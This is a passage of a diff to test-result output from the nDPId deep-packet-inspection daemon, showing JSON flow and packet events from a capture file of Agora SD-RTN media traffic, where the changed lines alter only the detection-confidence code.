{"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1649093580793,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":273,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":273,"pkt_l4_len":239,"thread_ts_msec":1649093580793,"pkt":"eJS0JASgYDjgxTWgCABFoAEDlPZAAD8RFQTAqAJkgAFNQqxjH8IA73jXAJl4HQAAIQAAAAAABFNOSQAZADEyOC0xLTc3LTY2LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJg90n6PIHuGl\/eNNcAGtWbljeiinpOBz\/8f6Thq1EFFQUQEAEFFU0dQVUJTQQAE4fteiUHAa3vScKrQ7k6uVwHTk73GWGrTdxZ5NRX5jjFw27S+1Fe\/4HWIj\/MeCLdpKQNrrdCTyFKV0x0L6QsHDEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1649093580793,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":273,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":273,"pkt_l4_len":239,"thread_ts_msec":1649093580793,"pkt":"eJS0JASgYDjgxTWgCABFoAEDlPdAAD8RFQPAqAJkgAFNQqxjH8IA73jXAJl4HQAAIQAAAAAABFNOSQAZADEyOC0xLTc3LTY2LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJg90n6PIHuGl\/eNNcAGtWbljeiinpOBz\/8f6Thq1EFFQUQEAEFFU0dQVUJTQQAE4fteiUHAa3vScKrQ7k6uVwHTk73GWGrTdxZ5NRX5jjFw27S+1Fe\/4HWIj\/MeCLdpKQNrrdCTyFKV0x0L6QsHDEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093640794,"flow_last_seen":1649093640794,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093640794,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1649093640794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093640794,"pkt":"eJS0JASgYDjgxTWgCABFoAEG+itAAD8RqmPAqAJkF\/i6s6xjH8IA8v\/kAJCYkAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJh5RjvoT8nXWQoTczbqfuCTWtSWIxMM71dLXfMImkFFQUQEAEFFU0dQVUJTQQAEo1EDK0BV7P7bdQLDfP5fh7OnOsU36QmWzSAbWPLojMYYoxcRozYKWIUqAOqOVU9JKdnROu06m38bLWdrLI75sktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093640794,"flow_last_seen":1649093640794,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093640794,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093640794,"flow_last_seen":1649093640794,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093640794,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1649093640794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093640794,"pkt":"eJS0JASgYDjgxTWgCABFoAEG+ixAAD8RqmLAqAJkF\/i6s6xjH8IA8v\/kAJCYkAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJh5RjvoT8nXWQoTczbqfuCTWtSWIxMM71dLXfMImkFFQUQEAEFFU0dQVUJTQQAEo1EDK0BV7P7bdQLDfP5fh7OnOsU36QmWzSAbWPLojMYYoxcRozYKWIUqAOqOVU9JKdnROu06m38bLWdrLI75sktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1649093640794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093640794,"pkt":"eJS0JASgYDjgxTWgCABFoAEG+i1AAD8RqmHAqAJkF\/i6s6xjH8IA8v\/kAJCYkAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJh5RjvoT8nXWQoTczbqfuCTWtSWIxMM71dLXfMImkFFQUQEAEFFU0dQVUJTQQAEo1EDK0BV7P7bdQLDfP5fh7OnOsU36QmWzSAbWPLojMYYoxcRozYKWIUqAOqOVU9JKdnROu06m38bLWdrLI75sktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093640842,"flow_last_seen":1649093640842,"flow_idle_time":200000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":0,"thread_ts_msec":1649093640842,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":46798,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00748{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1649093640842,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":1649093640842,"pkt":"eJS0JASgYDjgxTWgCABFoAD+96lAAD8RrO3AqAJkF\/i6s7bOH8IA6rDHAE8OHQAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfnlO0oTMjFpPQok0BeNgyMsfWK6tyRBP6qOIuGb0FFQUQEAEFFU0dQVUJTQQAEAmWTpv00Mu9s9eHO9YKHmJzM0p0SEfRhaw\/S2nD2he9vNE4MilAXm44Pd9F9VdBkmWwGneaYgayG992+Tfg\/xEtFWFMEAFAyNTZDQ1JUIAD\/l8GP5RGYHxKUln7foXlIqEex7RofPmJwbQTGCLgnmQ=="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093640842,"flow_last_seen":1649093640842,"flow_idle_time":200000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":0,"thread_ts_msec":1649093640842,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":46798,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093640842,"flow_last_seen":1649093640842,"flow_idle_time":200000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":0,"thread_ts_msec":1649093640842,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":46798,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00748{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1649093640842,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":1649093640842,"pkt":"eJS0JASgYDjgxTWgCABFoAD+96pAAD8RrOzAqAJkF\/i6s7bOH8IA6rDHAE8OHQAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfnlO0oTMjFpPQok0BeNgyMsfWK6tyRBP6qOIuGb0FFQUQEAEFFU0dQVUJTQQAEAmWTpv00Mu9s9eHO9YKHmJzM0p0SEfRhaw\/S2nD2he9vNE4MilAXm44Pd9F9VdBkmWwGneaYgayG992+Tfg\/xEtFWFMEAFAyNTZDQ1JUIAD\/l8GP5RGYHxKUln7foXlIqEex7RofPmJwbQTGCLgnmQ=="} 00748{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1649093640842,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":1649093640842,"pkt":"eJS0JASgYDjgxTWgCABFoAD+96tAAD8RrOvAqAJkF\/i6s7bOH8IA6rDHAE8OHQAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfnlO0oTMjFpPQok0BeNgyMsfWK6tyRBP6qOIuGb0FFQUQEAEFFU0dQVUJTQQAEAmWTpv00Mu9s9eHO9YKHmJzM0p0SEfRhaw\/S2nD2he9vNE4MilAXm44Pd9F9VdBkmWwGneaYgayG992+Tfg\/xEtFWFMEAFAyNTZDQ1JUIAD\/l8GP5RGYHxKUln7foXlIqEex7RofPmJwbQTGCLgnmQ=="} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093710805,"flow_last_seen":1649093710805,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093710805,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1649093710805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093710805,"pkt":"eJS0JASgYDjgxTWgCABFoAEGsJpAAD8R8\/PAqAJkF\/i6tKxjH8IA8uctAM5VpAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJi\/yhYl+4tFxfRy\/hjYWvCs3sWcLaw7yUyJriC7EkFFQUQEAEFFU0dQVUJTQQAEvd1t+W9UAMlutRwaUc3brStpNzMotBC8tKv3ozdxhPxlu+KeK3Ixnyt4Iph078ycHtNzhwl8N0HwbJs1Xqgd6EtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093710805,"flow_last_seen":1649093710805,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093710805,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093710805,"flow_last_seen":1649093710805,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093710805,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1649093710806,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093710806,"pkt":"eJS0JASgYDjgxTWgCABFoAEGsJtAAD8R8\/LAqAJkF\/i6tKxjH8IA8uctAM5VpAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJi\/yhYl+4tFxfRy\/hjYWvCs3sWcLaw7yUyJriC7EkFFQUQEAEFFU0dQVUJTQQAEvd1t+W9UAMlutRwaUc3brStpNzMotBC8tKv3ozdxhPxlu+KeK3Ixnyt4Iph078ycHtNzhwl8N0HwbJs1Xqgd6EtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1649093710806,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093710806,"pkt":"eJS0JASgYDjgxTWgCABFoAEGsJxAAD8R8\/HAqAJkF\/i6tKxjH8IA8uctAM5VpAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJi\/yhYl+4tFxfRy\/hjYWvCs3sWcLaw7yUyJriC7EkFFQUQEAEFFU0dQVUJTQQAEvd1t+W9UAMlutRwaUc3brStpNzMotBC8tKv3ozdxhPxlu+KeK3Ixnyt4Iph078ycHtNzhwl8N0HwbJs1Xqgd6EtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093494644,"flow_last_seen":1649093494689,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3169,"flow_avg_l4_payload_len":211,"midstream":0,"thread_ts_msec":1649093710879,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":35778,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093494350,"flow_last_seen":1649093494400,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3169,"flow_avg_l4_payload_len":211,"midstream":0,"thread_ts_msec":1649093710879,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":35778,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093494644,"flow_last_seen":1649093494689,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3169,"flow_avg_l4_payload_len":211,"midstream":0,"thread_ts_msec":1649093710879,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":35778,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093494350,"flow_last_seen":1649093494400,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3169,"flow_avg_l4_payload_len":211,"midstream":0,"thread_ts_msec":1649093710879,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":35778,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","packets-captured":121,"packets-processed":120,"total-skipped-flows":0,"total-l4-payload-len":29232,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":8,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":1649098069656} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098069656,"flow_last_seen":1649098069656,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098069656,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":40393,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1649098069656,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098069656,"pkt":"eJS0JASgYDjgxTWgCABFoAEGneRAAD8RBqvAqAJkF\/i6s53JH8IA8s3FANAqagAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXiddqZ56BOXneEQ4mP388RlUbMx7s0KlWJgk5kvEFFQUQEAEFFU0dQVUJTQQAE2i0ZP5UqhloJODTaOh+IlYI+UqEvQtfYePDLs+DPY\/wb\/ex7kxsKDZa0UBpqtKFPW3cONzQvrgAKQsaxWmXF50tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098069656,"flow_last_seen":1649098069656,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098069656,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":40393,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098069656,"flow_last_seen":1649098069656,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098069656,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":40393,"dst_port":8130,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1649098069656,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098069656,"pkt":"eJS0JASgYDjgxTWgCABFoAEGneVAAD8RBqrAqAJkF\/i6s53JH8IA8s3FANAqagAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXiddqZ56BOXneEQ4mP388RlUbMx7s0KlWJgk5kvEFFQUQEAEFFU0dQVUJTQQAE2i0ZP5UqhloJODTaOh+IlYI+UqEvQtfYePDLs+DPY\/wb\/ex7kxsKDZa0UBpqtKFPW3cONzQvrgAKQsaxWmXF50tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1649098069656,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098069656,"pkt":"eJS0JASgYDjgxTWgCABFoAEGneZAAD8RBqnAqAJkF\/i6s53JH8IA8s3FANAqagAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXiddqZ56BOXneEQ4mP388RlUbMx7s0KlWJgk5kvEFFQUQEAEFFU0dQVUJTQQAE2i0ZP5UqhloJODTaOh+IlYI+UqEvQtfYePDLs+DPY\/wb\/ex7kxsKDZa0UBpqtKFPW3cONzQvrgAKQsaxWmXF50tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098069706,"flow_last_seen":1649098069706,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098069706,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47453,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1649098069706,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098069706,"pkt":"eJS0JASgYDjgxTWgCABFoAEGnXhAAD8RBxfAqAJkF\/i6s7ldH8IA8lBqANlPMQAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXhQpGxSUTlZVVzRgedZI3rLw+yxzMMdRjhd4IxCkFFQUQEAEFFU0dQVUJTQQAEzTSboCt7FM6A6woBSDA6BXje0FytH\/VlmqM5WAGn1G0SDjb8WsY2P509Oy+4jMINQREZeQEsu3l+MyWzK1mwlUtFWFMEAFAyNTZDQ1JUKADZFgkMuGiQFv+XwY\/lEZgfEpSWft+heUioR7HtGh8+YnBtBMYIuCeZ"} 